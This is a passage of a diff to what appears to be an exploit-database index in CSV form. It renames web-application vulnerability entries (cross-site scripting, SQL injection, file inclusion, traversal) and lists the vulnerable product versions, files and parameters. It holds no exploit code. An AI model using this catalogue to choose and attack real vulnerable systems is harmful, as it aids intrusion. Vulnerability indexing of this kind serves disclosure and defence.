'viewFriends.php' Multiple Cross-Site Scripting Vulnerabilities",2012-02-21,"Aung Khant",php,webapps,0 +36854,platforms/php/webapps/36854.txt,"Dolphin 7.0.x - 'explanation.php?explain' Cross-Site Scripting",2012-02-21,"Aung Khant",php,webapps,0 +36856,platforms/php/webapps/36856.txt,"Joomla! Component com_xvs - 'Controller' Local File Inclusion",2012-02-18,KedAns-Dz,php,webapps,0 36860,platforms/php/webapps/36860.txt,"WordPress Plugin TheCartPress 1.3.9 - Multiple Vulnerabilities",2015-04-29,"High-Tech Bridge SA",php,webapps,80 36861,platforms/windows/webapps/36861.txt,"Wing FTP Server Admin 4.4.5 - Multiple Vulnerabilities",2015-04-29,hyp3rlinx,windows,webapps,5466 36862,platforms/php/webapps/36862.txt,"OS Solution OSProperty 2.8.0 - SQL Injection",2015-04-29,"Brandon Perry",php,webapps,80 @@ -35778,61 +35779,61 @@ id,file,description,date,author,platform,type,port 36870,platforms/php/webapps/36870.txt,"ContentLion Alpha 1.3 - 'login.php' Cross-Site Scripting",2012-02-22,"Stefan Schurtz",php,webapps,0 36873,platforms/php/webapps/36873.txt,"Dolibarr CMS 3.2 Alpha - Multiple Directory Traversal Vulnerabilities",2012-02-22,"Benjamin Kunz Mejri",php,webapps,0 36874,platforms/php/webapps/36874.txt,"Chyrp 2.1.1 - 'ajax.php' HTML Injection",2012-02-22,"High-Tech Bridge SA",php,webapps,0 -36875,platforms/php/webapps/36875.txt,"Chyrp 2.1.2 - includes/error.php body Parameter Cross-Site Scripting",2012-02-22,"High-Tech Bridge SA",php,webapps,0 -36876,platforms/php/webapps/36876.txt,"Oxwall 1.1.1 - 'plugin' Parameter Cross-Site Scripting",2012-02-22,Ariko-Security,php,webapps,0 +36875,platforms/php/webapps/36875.txt,"Chyrp 2.1.2 - 'includes/error.php?body' Cross-Site Scripting",2012-02-22,"High-Tech Bridge SA",php,webapps,0 +36876,platforms/php/webapps/36876.txt,"Oxwall 1.1.1 - 'plugin' Cross-Site Scripting",2012-02-22,Ariko-Security,php,webapps,0 36878,platforms/php/webapps/36878.txt,"Mobile Mp3 Search Script 2.0 - 'dl.php' HTTP Response Splitting",2012-02-23,"Corrado Liotta",php,webapps,0 -36882,platforms/php/webapps/36882.txt,"MyJobList 0.1.3 - 'eid' Parameter SQL Injection",2012-02-26,"Red Security TEAM",php,webapps,0 +36882,platforms/php/webapps/36882.txt,"MyJobList 0.1.3 - 'eid' SQL Injection",2012-02-26,"Red Security TEAM",php,webapps,0 36883,platforms/php/webapps/36883.txt,"Webglimpse 2.x - Multiple Cross-Site Scripting Vulnerabilities",2012-02-26,MustLive,php,webapps,0 36885,platforms/php/webapps/36885.txt,"Bontq - 'user/' URI Cross-Site Scripting",2012-02-27,sonyy,php,webapps,0 36886,platforms/php/webapps/36886.txt,"OSQA's CMS - Multiple HTML Injection Vulnerabilities",2012-02-27,"Ucha Gobejishvili",php,webapps,0 -36888,platforms/php/webapps/36888.html,"Dotclear 2.4.1.2 - '/admin/auth.php login_data' Parameter Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",php,webapps,0 -36889,platforms/php/webapps/36889.txt,"Dotclear 2.4.1.2 - '/admin/blogs.php nb' Parameter Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",php,webapps,0 -36890,platforms/php/webapps/36890.txt,"Dotclear 2.4.1.2 - '/admin/comments.php' Multiple Parameter Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",php,webapps,0 -36891,platforms/php/webapps/36891.txt,"Dotclear 2.4.1.2 - '/admin/plugin.php page' Parameter Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",php,webapps,0 +36888,platforms/php/webapps/36888.html,"Dotclear 2.4.1.2 - '/admin/auth.php?login_data' Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",php,webapps,0 +36889,platforms/php/webapps/36889.txt,"Dotclear 2.4.1.2 - '/admin/blogs.php?nb' Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",php,webapps,0 +36890,platforms/php/webapps/36890.txt,"Dotclear 2.4.1.2 - '/admin/comments.php' Multiple Cross-Site Scripting Vulnerabilities",2012-02-29,"High-Tech Bridge SA",php,webapps,0 +36891,platforms/php/webapps/36891.txt,"Dotclear 2.4.1.2 - '/admin/plugin.php?page' Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",php,webapps,0 36892,platforms/php/webapps/36892.html,"Traidnt Topics Viewer 2.0 - 'main.php' Cross-Site Request Forgery",2012-02-29,"Green Hornet",php,webapps,0 36893,platforms/php/webapps/36893.txt,"Fork CMS 3.x - private/en/locale/index name Parameter Cross-Site Scripting",2012-02-28,anonymous,php,webapps,0 -36894,platforms/php/webapps/36894.txt,"Fork CMS 3.x - 'backend/modules/error/actions/index.php parse()' Multiple Parameter Error Display Cross-Site Scripting",2012-02-28,anonymous,php,webapps,0 -36895,platforms/php/webapps/36895.txt,"starCMS - 'q' Parameter URI Cross-Site Scripting",2012-03-02,Am!r,php,webapps,0 +36894,platforms/php/webapps/36894.txt,"Fork CMS 3.x - 'backend/modules/error/actions/index.php parse()' Multiple Error Display Cross-Site Scripting Vulnerabilities",2012-02-28,anonymous,php,webapps,0 +36895,platforms/php/webapps/36895.txt,"starCMS - 'q' URI Cross-Site Scripting",2012-03-02,Am!r,php,webapps,0 36897,platforms/php/webapps/36897.txt,"LastGuru ASP Guestbook - 'View.asp' SQL Injection",2012-03-04,demonalex,php,webapps,0 -36898,platforms/php/webapps/36898.txt,"Etano 1.20/1.22 - search.php Multiple Parameter Cross-Site Scripting",2012-03-05,"Aung Khant",php,webapps,0 -36899,platforms/php/webapps/36899.txt,"Etano 1.20/1.22 - photo_search.php Multiple Parameter Cross-Site Scripting",2012-03-05,"Aung Khant",php,webapps,0 -36900,platforms/php/webapps/36900.txt,"Etano 1.20/1.22 - photo_view.php return Parameter Cross-Site Scripting",2012-03-05,"Aung Khant",php,webapps,0 +36898,platforms/php/webapps/36898.txt,"Etano 1.20/1.22 - 'search.php' Multiple Cross-Site Scripting Vulnerabilities",2012-03-05,"Aung Khant",php,webapps,0 +36899,platforms/php/webapps/36899.txt,"Etano 1.20/1.22 - 'photo_search.php' Multiple Cross-Site Scripting Vulnerabilities",2012-03-05,"Aung Khant",php,webapps,0 +36900,platforms/php/webapps/36900.txt,"Etano 1.20/1.22 - 'photo_view.php?return' Cross-Site Scripting",2012-03-05,"Aung Khant",php,webapps,0 36914,platforms/php/webapps/36914.txt,"Fork CMS 3.2.x - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-03-06,"Gjoko Krstic",php,webapps,0 -36916,platforms/php/webapps/36916.txt,"Exponent CMS 2.0 - 'src' Parameter SQL Injection",2012-03-07,"Rob Miller",php,webapps,0 +36916,platforms/php/webapps/36916.txt,"Exponent CMS 2.0 - 'src' SQL Injection",2012-03-07,"Rob Miller",php,webapps,0 36917,platforms/php/webapps/36917.txt,"OSClass 2.3.x - Directory Traversal / Arbitrary File Upload",2012-03-07,"Filippo Cavallarin",php,webapps,0 -36910,platforms/php/webapps/36910.txt,"Open Realty 2.5.x - 'select_users_template' Parameter Local File Inclusion",2012-03-05,"Aung Khant",php,webapps,0 -36911,platforms/php/webapps/36911.txt,"11in1 CMS 1.2.1 - 'admin/comments topicID' Parameter SQL Injection",2012-03-05,"Chokri B.A",php,webapps,0 -36912,platforms/php/webapps/36912.txt,"11in1 CMS 1.2.1 - 'admin/tps id' Parameter SQL Injection",2012-03-05,"Chokri B.A",php,webapps,0 +36910,platforms/php/webapps/36910.txt,"Open Realty 2.5.x - 'select_users_template' Local File Inclusion",2012-03-05,"Aung Khant",php,webapps,0 +36911,platforms/php/webapps/36911.txt,"11in1 CMS 1.2.1 - 'admin/comments?topicID' SQL Injection",2012-03-05,"Chokri B.A",php,webapps,0 +36912,platforms/php/webapps/36912.txt,"11in1 CMS 1.2.1 - 'admin/tps?id' SQL Injection",2012-03-05,"Chokri B.A",php,webapps,0 36913,platforms/php/webapps/36913.pl,"Joomla! 2.5.1 - 'redirect.php' Time Based SQL Injection",2012-03-05,"Colin Wong",php,webapps,0 36904,platforms/ios/webapps/36904.txt,"PhotoWebsite 3.1 iOS - Local File Inclusion",2015-05-04,Vulnerability-Lab,ios,webapps,0 36973,platforms/php/webapps/36973.txt,"GNUBoard 4.34.20 - 'download.php' HTML Injection",2012-03-20,wh1ant,php,webapps,0 36922,platforms/ios/webapps/36922.txt,"vPhoto-Album 4.2 iOS - Local File Inclusion",2015-05-06,Vulnerability-Lab,ios,webapps,0 -36907,platforms/php/webapps/36907.txt,"WordPress Plugin Ultimate Product Catalogue 3.1.2 - Multiple Persistent Cross-Site Scripting / Cross-Site Request Forgery / Arbitrary File Upload",2015-05-04,"Felipe Molina",php,webapps,0 +36907,platforms/php/webapps/36907.txt,"WordPress Plugin Ultimate Product Catalogue 3.1.2 - Multiple Persistent Cross-Site Scripting / Cross-Site Request Forgery / Arbitrary File Upload Vulnerabilities",2015-05-04,"Felipe Molina",php,webapps,0 36965,platforms/php/webapps/36965.txt,"Omnistar Live - Cross-Site Scripting / SQL Injection",2012-03-13,sonyy,php,webapps,0 36967,platforms/php/webapps/36967.txt,"Max's Guestbook 1.0 - Multiple Remote Vulnerabilities",2012-03-14,n0tch,php,webapps,0 -36968,platforms/php/webapps/36968.txt,"Max's PHP Photo Album 1.0 - 'id' Parameter Local File Inclusion",2012-03-14,n0tch,php,webapps,0 -36970,platforms/php/webapps/36970.txt,"JPM Article Script 6 - 'page2' Parameter SQL Injection",2012-03-16,"Vulnerability Research Laboratory",php,webapps,0 -36971,platforms/java/webapps/36971.txt,"JavaBB 0.99 - 'userId' Parameter Cross-Site Scripting",2012-03-18,sonyy,java,webapps,0 +36968,platforms/php/webapps/36968.txt,"Max's PHP Photo Album 1.0 - 'id' Local File Inclusion",2012-03-14,n0tch,php,webapps,0 +36970,platforms/php/webapps/36970.txt,"JPM Article Script 6 - 'page2' SQL Injection",2012-03-16,"Vulnerability Research Laboratory",php,webapps,0 +36971,platforms/java/webapps/36971.txt,"JavaBB 0.99 - 'userId' Cross-Site Scripting",2012-03-18,sonyy,java,webapps,0 36924,platforms/ios/webapps/36924.txt,"PDF Converter & Editor 2.1 iOS - Local File Inclusion",2015-05-06,Vulnerability-Lab,ios,webapps,0 36925,platforms/php/webapps/36925.py,"elFinder 2 - Remote Command Execution (via File Creation)",2015-05-06,"TUNISIAN CYBER",php,webapps,0 -36926,platforms/php/webapps/36926.txt,"LeKommerce - 'id' Parameter SQL Injection",2012-03-08,Mazt0r,php,webapps,0 -36927,platforms/php/webapps/36927.txt,"ToendaCMS 1.6.2 - setup/index.php site Parameter Traversal Local File Inclusion",2012-03-08,AkaStep,php,webapps,0 +36926,platforms/php/webapps/36926.txt,"LeKommerce - 'id' SQL Injection",2012-03-08,Mazt0r,php,webapps,0 +36927,platforms/php/webapps/36927.txt,"ToendaCMS 1.6.2 - 'setup/index.php?site' Traversal Local File Inclusion",2012-03-08,AkaStep,php,webapps,0 36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0 36930,platforms/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0 -36934,platforms/asp/webapps/36934.txt,"SAP Business Objects InfoVew System - listing.aspx searchText Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0 -36935,platforms/asp/webapps/36935.txt,"SAP Business Objects InfoView System - '/help/helpredir.aspx guide' Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0 -36936,platforms/asp/webapps/36936.txt,"SAP Business Objects InfoView System - '/webi/webi_modify.aspx id' Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0 +36934,platforms/asp/webapps/36934.txt,"SAP Business Objects InfoVew System - 'listing.aspx?searchText' Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0 +36935,platforms/asp/webapps/36935.txt,"SAP Business Objects InfoView System - '/help/helpredir.aspx?guide' Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0 +36936,platforms/asp/webapps/36936.txt,"SAP Business Objects InfoView System - '/webi/webi_modify.aspx?id' Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0 36937,platforms/php/webapps/36937.html,"PHPMyVisites 2.4 - PHPmv2/index.php Multiple Cross-Site Scripting Vulnerabilities",2012-03-09,AkaStep,php,webapps,0 -36938,platforms/php/webapps/36938.txt,"Singapore 0.10.1 - 'gallery' Parameter Cross-Site Scripting",2012-03-11,T0xic,php,webapps,0 -36939,platforms/java/webapps/36939.txt,"EJBCA 4.0.7 - 'issuer' Parameter Cross-Site Scripting",2012-03-11,MustLive,java,webapps,0 +36938,platforms/php/webapps/36938.txt,"Singapore 0.10.1 - 'gallery' Cross-Site Scripting",2012-03-11,T0xic,php,webapps,0 +36939,platforms/java/webapps/36939.txt,"EJBCA 4.0.7 - 'issuer' Cross-Site Scripting",2012-03-11,MustLive,java,webapps,0 36940,platforms/cgi/webapps/36940.txt,"Dell SonicWALL Secure Remote Access (SRA) Appliance - Cross-Site Request Forgery",2015-05-07,"Veit Hailperin",cgi,webapps,443 36941,platforms/xml/webapps/36941.txt,"IBM Websphere Portal - Persistent Cross-Site Scripting",2015-05-07,"Filippo Roncari",xml,webapps,0 36942,platforms/php/webapps/36942.txt,"WordPress Plugin Freshmail 1.5.8 - 'shortcode.php' SQL Injection",2015-05-07,"Felipe Molina",php,webapps,80 36943,platforms/ios/webapps/36943.txt,"Album Streamer 2.0 iOS - Directory Traversal",2015-05-07,Vulnerability-Lab,ios,webapps,0 36944,platforms/php/webapps/36944.txt,"Synology Photo Station 5 DSM 3.2 - 'photo_one.php' Script Cross-Site Scripting",2012-03-12,"Simon Ganiere",php,webapps,0 -36946,platforms/php/webapps/36946.txt,"Wikidforum 2.10 - Advanced Search Multiple Field SQL Injection",2012-03-12,"Stefan Schurtz",php,webapps,0 +36946,platforms/php/webapps/36946.txt,"Wikidforum 2.10 - Advanced Search Multiple Field SQL Injections",2012-03-12,"Stefan Schurtz",php,webapps,0 36947,platforms/php/webapps/36947.txt,"Wikidforum 2.10 - Search Field Cross-Site Scripting",2012-03-12,"Stefan Schurtz",php,webapps,0 -36948,platforms/php/webapps/36948.txt,"Wikidforum 2.10 - Advanced Search Multiple Field Cross-Site Scripting",2012-03-12,"Stefan Schurtz",php,webapps,0 +36948,platforms/php/webapps/36948.txt,"Wikidforum 2.10 - Advanced Search Multiple Cross-Site Scripting Vulnerabilities",2012-03-12,"Stefan Schurtz",php,webapps,0 36949,platforms/php/webapps/36949.txt,"Xeams 4.5 Build 5755 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps,5272 36950,platforms/php/webapps/36950.txt,"Syncrify Server 3.6 Build 833 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps,5800 36951,platforms/php/webapps/36951.txt,"SynaMan 3.4 Build 1436 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps,0 @@ -35845,13 +35846,13 @@ id,file,description,date,author,platform,type,port 36961,platforms/php/webapps/36961.txt,"WordPress Plugin Ad Inserter 1.5.2 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",php,webapps,80 36963,platforms/linux/webapps/36963.txt,"Alienvault OSSIM/USM 4.14/4.15/5.0 - Multiple Vulnerabilities",2015-05-08,"Peter Lapp",linux,webapps,0 36974,platforms/cgi/webapps/36974.txt,"WebGlimpse 2.14.1/2.18.8 - 'webglimpse.cgi' Remote Command Injection",2012-03-20,"Kevin Perry",cgi,webapps,0 -36975,platforms/php/webapps/36975.txt,"ClassifiedsGeek.com Vacation Packages - 'listing_search' Parameter SQL Injection",2012-03-19,r45c4l,php,webapps,0 +36975,platforms/php/webapps/36975.txt,"ClassifiedsGeek.com Vacation Packages - 'listing_search' SQL Injection",2012-03-19,r45c4l,php,webapps,0 36976,platforms/cgi/webapps/36976.txt,"WebGlimpse 2.x - 'wgarcmin.cgi' Full Path Disclosure",2012-03-18,Websecurity,cgi,webapps,0 -36977,platforms/php/webapps/36977.pl,"CreateVision CMS - 'id' Parameter SQL Injection",2012-03-11,"Zwierzchowski Oskar",php,webapps,0 +36977,platforms/php/webapps/36977.pl,"CreateVision CMS - 'id' SQL Injection",2012-03-11,"Zwierzchowski Oskar",php,webapps,0 36978,platforms/hardware/webapps/36978.txt,"ZTE F660 - Remote Config Download",2015-05-11,"Daniel Cisa",hardware,webapps,0 36979,platforms/php/webapps/36979.sh,"WordPress Plugin N-Media Website Contact Form with File Upload 1.3.4 - Arbitrary File Upload (2)",2015-05-11,"Claudio Viviani & F17.c0de",php,webapps,0 37186,platforms/php/webapps/37186.txt,"VFront 0.99.2 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2015-06-03,hyp3rlinx,php,webapps,0 -37006,platforms/java/webapps/37006.txt,"Minify 2.1.x - 'g' Parameter Cross-Site Scripting",2012-03-21,"Ayoub Aboukir",java,webapps,0 +37006,platforms/java/webapps/37006.txt,"Minify 2.1.x - 'g' Cross-Site Scripting",2012-03-21,"Ayoub Aboukir",java,webapps,0 36986,platforms/php/webapps/36986.txt,"Pluck CMS 4.7 - Directory Traversal",2015-05-11,Wadeek,php,webapps,0 36987,platforms/hardware/webapps/36987.pl,"D-Link DSL-500B Gen 2 - (Parental Control Configuration Panel) Persistent Cross-Site Scripting",2015-05-11,"XLabs Security",hardware,webapps,0 36988,platforms/hardware/webapps/36988.pl,"D-Link DSL-500B Gen 2 - (URL Filter Configuration Panel) Persistent Cross-Site Scripting",2015-05-11,"XLabs Security",hardware,webapps,0 @@ -35867,51 +35868,51 @@ id,file,description,date,author,platform,type,port 37002,platforms/php/webapps/37002.txt,"Open Journal Systems (OJS) 2.3.6 - 'rfiles.php' Traversal Arbitrary File Manipulation",2012-03-21,"High-Tech Bridge",php,webapps,0 37003,platforms/php/webapps/37003.txt,"WordPress Plugin Booking Calendar Contact Form 1.0.2 - Multiple Vulnerabilities",2015-05-13,"i0akiN SEC-LABORATORY",php,webapps,0 37004,platforms/php/webapps/37004.txt,"PHPCollab 2.5 - 'deletetopics.php' SQL Injection",2015-05-13,Wadeek,php,webapps,0 -37008,platforms/php/webapps/37008.txt,"Event Calendar PHP - 'cal_year' Parameter Cross-Site Scripting",2012-03-24,3spi0n,php,webapps,0 +37008,platforms/php/webapps/37008.txt,"Event Calendar PHP - 'cal_year' Cross-Site Scripting",2012-03-24,3spi0n,php,webapps,0 37009,platforms/java/webapps/37009.xml,"Apache Struts 2.0 - 'XSLTResult.java' Arbitrary File Upload",2012-03-23,voidloafer,java,webapps,0 -37010,platforms/php/webapps/37010.txt,"Zumset.com FbiLike 1.00 - 'id' Parameter Cross-Site Scripting",2012-03-25,Crim3R,php,webapps,0 +37010,platforms/php/webapps/37010.txt,"Zumset.com FbiLike 1.00 - 'id' Cross-Site Scripting",2012-03-25,Crim3R,php,webapps,0 37011,platforms/php/webapps/37011.txt,"Geeklog 1.8.1 - 'index.php' SQL Injection",2012-03-27,HELLBOY,php,webapps,0 -37012,platforms/php/webapps/37012.txt,"NextBBS 0.6 - ajaxserver.php Multiple Function SQL Injection",2012-03-27,waraxe,php,webapps,0 +37012,platforms/php/webapps/37012.txt,"NextBBS 0.6 - 'ajaxserver.php' Multiple SQL Injections",2012-03-27,waraxe,php,webapps,0 37013,platforms/php/webapps/37013.txt,"NextBBS 0.6 - 'index.php' do Parameter Cross-Site Scripting",2012-03-27,waraxe,php,webapps,0 37015,platforms/asp/webapps/37015.txt,"Matthew1471 BlogX - Multiple Cross-Site Scripting Vulnerabilities",2012-03-27,demonalex,asp,webapps,0 -37016,platforms/php/webapps/37016.txt,"WordPress Plugin Integrator 1.32 - 'redirect_to' Parameter Cross-Site Scripting",2012-03-28,"Stefan Schurtz",php,webapps,0 -37017,platforms/php/webapps/37017.txt,"Invision Power Board 4.2.1 - 'searchText' Parameter Cross-Site Scripting",2012-03-28,sonyy,php,webapps,0 +37016,platforms/php/webapps/37016.txt,"WordPress Plugin Integrator 1.32 - 'redirect_to' Cross-Site Scripting",2012-03-28,"Stefan Schurtz",php,webapps,0 +37017,platforms/php/webapps/37017.txt,"Invision Power Board 4.2.1 - 'searchText' Cross-Site Scripting",2012-03-28,sonyy,php,webapps,0 37018,platforms/php/webapps/37018.txt,"MyBB 1.6.6 - 'index.php' conditions[usergroup][] Parameter SQL Injection",2013-03-27,"Aditya Modha",php,webapps,0 37019,platforms/php/webapps/37019.txt,"MyBB 1.6.6 - 'index.php' conditions[usergroup][] Parameter Cross-Site Scripting",2013-03-27,"Aditya Modha",php,webapps,0 37021,platforms/php/webapps/37021.txt,"TomatoCart 1.2.0 Alpha 2 - 'json.php' Local File Inclusion",2012-03-28,"Canberk BOLAT",php,webapps,0 -37022,platforms/php/webapps/37022.txt,"ocPortal 7.1.5 - code_editor.php Multiple Parameter Cross-Site Scripting",2012-03-28,"High-Tech Bridge",php,webapps,0 +37022,platforms/php/webapps/37022.txt,"ocPortal 7.1.5 - 'code_editor.php' Multiple Cross-Site Scripting Vulnerabilities",2012-03-28,"High-Tech Bridge",php,webapps,0 37023,platforms/php/webapps/37023.txt,"EasyPHP - 'main.php' SQL Injection",2012-03-29,"Skote Vahshat",php,webapps,0 37024,platforms/php/webapps/37024.txt,"EZ Publish 4.x 'ezjscore' Module - Cross-Site Scripting",2012-03-29,"Yann MICHARD",php,webapps,0 37025,platforms/php/webapps/37025.txt,"PHP Designer 2007 Personal - Multiple SQL Injections",2012-03-30,MR.XpR,php,webapps,0 -37026,platforms/php/webapps/37026.txt,"e107 1.0 - 'view' Parameter SQL Injection",2012-03-30,Am!r,php,webapps,0 -37027,platforms/php/webapps/37027.txt,"Simple Machines Forum (SMF) 2.0.2 - 'scheduled' Parameter Cross-Site Scripting",2012-03-29,Am!r,php,webapps,0 -37028,platforms/php/webapps/37028.txt,"JamWiki 1.1.5 - 'num' Parameter Cross-Site Scripting",2012-03-30,"Sooraj K.S",php,webapps,0 -37029,platforms/java/webapps/37029.txt,"ManageEngine Firewall Analyzer 7.2 - fw/index2.do Multiple Parameter Cross-Site Scripting",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0 +37026,platforms/php/webapps/37026.txt,"e107 1.0 - 'view' SQL Injection",2012-03-30,Am!r,php,webapps,0 +37027,platforms/php/webapps/37027.txt,"Simple Machines Forum (SMF) 2.0.2 - 'scheduled' Cross-Site Scripting",2012-03-29,Am!r,php,webapps,0 +37028,platforms/php/webapps/37028.txt,"JamWiki 1.1.5 - 'num' Cross-Site Scripting",2012-03-30,"Sooraj K.S",php,webapps,0 +37029,platforms/java/webapps/37029.txt,"ManageEngine Firewall Analyzer 7.2 - 'fw/index2.do' Multiple Cross-Site Scripting Vulnerabilities",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0 37030,platforms/java/webapps/37030.txt,"ManageEngine Firewall Analyzer 7.2 - fw/createAnomaly.do subTab Parameter Cross-Site Scripting",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0 37031,platforms/java/webapps/37031.txt,"ManageEngine Firewall Analyzer 7.2 - fw/mindex.do url Parameter Cross-Site Scripting",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0 37032,platforms/java/webapps/37032.txt,"ManageEngine Firewall Analyzer 7.2 - fw/syslogViewer.do port Parameter Cross-Site Scripting",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0 -37033,platforms/java/webapps/37033.txt,"JBMC Software DirectAdmin 1.403 - 'domain' Parameter Cross-Site Scripting",2012-04-02,"Dawid Golak",java,webapps,0 +37033,platforms/java/webapps/37033.txt,"JBMC Software DirectAdmin 1.403 - 'domain' Cross-Site Scripting",2012-04-02,"Dawid Golak",java,webapps,0 37034,platforms/php/webapps/37034.txt,"FlatnuX CMS - Traversal Arbitrary File Access",2012-04-01,"Vulnerability Laboratory",php,webapps,0 37035,platforms/php/webapps/37035.html,"FlatnuX CMS - Cross-Site Request Forgery (Add Admin)",2012-04-01,"Vulnerability Laboratory",php,webapps,0 -37038,platforms/php/webapps/37038.txt,"osCMax 2.5 - admin/login.php 'Username' Parameter Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 -37039,platforms/php/webapps/37039.txt,"osCMax 2.5 - admin/htaccess.php Multiple Parameter Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 -37040,platforms/php/webapps/37040.txt,"osCMax 2.5 - admin/xsell.php search Parameter Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 -37041,platforms/php/webapps/37041.txt,"osCMax 2.5 - admin/stats_products_purchased.php Multiple Parameter Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 -37042,platforms/php/webapps/37042.txt,"osCMax 2.5 - admin/stats_monthly_sales.php status Parameter Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 -37043,platforms/php/webapps/37043.txt,"osCMax 2.5 - admin/stats_customers.php sorted Parameter Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 -37044,platforms/php/webapps/37044.txt,"osCMax 2.5 - admin/information_manager.php information_id Parameter Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 -37045,platforms/php/webapps/37045.txt,"osCMax 2.5 - admin/geo_zones.php zID Parameter Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 -37046,platforms/php/webapps/37046.txt,"osCMax 2.5 - 'admin/new_attributes_include.php' Multiple Parameter Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 -37047,platforms/php/webapps/37047.html,"osCMax 2.5 - admin/login.php 'Username' Parameter SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0 -37048,platforms/php/webapps/37048.txt,"osCMax 2.5 - admin/stats_monthly_sales.php status Parameter SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37038,platforms/php/webapps/37038.txt,"osCMax 2.5 - 'admin/login.php?Username' Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37039,platforms/php/webapps/37039.txt,"osCMax 2.5 - 'admin/htaccess.php' Multiple Cross-Site Scripting Vulnerabilities",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37040,platforms/php/webapps/37040.txt,"osCMax 2.5 - 'admin/xsell.php?search' Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37041,platforms/php/webapps/37041.txt,"osCMax 2.5 - 'admin/stats_products_purchased.php' Multiple Cross-Site Scripting Vulnerabilities",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37042,platforms/php/webapps/37042.txt,"osCMax 2.5 - 'admin/stats_monthly_sales.php?status' Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37043,platforms/php/webapps/37043.txt,"osCMax 2.5 - 'admin/stats_customers.php?sorted' Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37044,platforms/php/webapps/37044.txt,"osCMax 2.5 - 'admin/information_manager.php?information_id' Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37045,platforms/php/webapps/37045.txt,"osCMax 2.5 - 'admin/geo_zones.php?zID' Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37046,platforms/php/webapps/37046.txt,"osCMax 2.5 - 'admin/new_attributes_include.php' Multiple Cross-Site Scripting Vulnerabilities",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37047,platforms/php/webapps/37047.html,"osCMax 2.5 - 'admin/login.php?Username' SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37048,platforms/php/webapps/37048.txt,"osCMax 2.5 - 'admin/stats_monthly_sales.php?status' SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0 37050,platforms/php/webapps/37050.txt,"Chronosite 5.12 - SQL Injection",2015-05-18,Wadeek,php,webapps,0 37054,platforms/php/webapps/37054.py,"ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal",2015-05-18,pandujar,php,webapps,0 37055,platforms/php/webapps/37055.txt,"Forma LMS 1.3 - Multiple PHP Object Injection Vulnerabilities",2015-05-18,"Filippo Roncari",php,webapps,80 37057,platforms/ios/webapps/37057.txt,"Wireless Photo Transfer 3.0 iOS - Local File Inclusion",2015-05-18,Vulnerability-Lab,ios,webapps,80 37058,platforms/multiple/webapps/37058.txt,"OYO File Manager 1.1 (iOS / Android) - Multiple Vulnerabilities",2015-05-18,Vulnerability-Lab,multiple,webapps,8080 37059,platforms/windows/webapps/37059.html,"ManageEngine EventLog Analyzer 10.0 Build 10001 - Cross-Site Request Forgery",2015-05-18,"Akash S. Chavan",windows,webapps,0 -37062,platforms/php/webapps/37062.txt,"vBulletin 4.1.10 - 'announcementid' Parameter SQL Injection",2012-04-04,Am!r,php,webapps,0 -37063,platforms/php/webapps/37063.txt,"WordPress Plugin TagGator - 'tagid' Parameter SQL Injection",2012-04-05,Am!r,php,webapps,0 +37062,platforms/php/webapps/37062.txt,"vBulletin 4.1.10 - 'announcementid' SQL Injection",2012-04-04,Am!r,php,webapps,0 +37063,platforms/php/webapps/37063.txt,"WordPress Plugin TagGator - 'tagid' SQL Injection",2012-04-05,Am!r,php,webapps,0 37067,platforms/php/webapps/37067.txt,"WordPress Plugin FeedWordPress 2015.0426 - SQL Injection",2015-05-20,"Adrián M. F.",php,webapps,80 37070,platforms/php/webapps/37070.txt,"WordPress Plugin 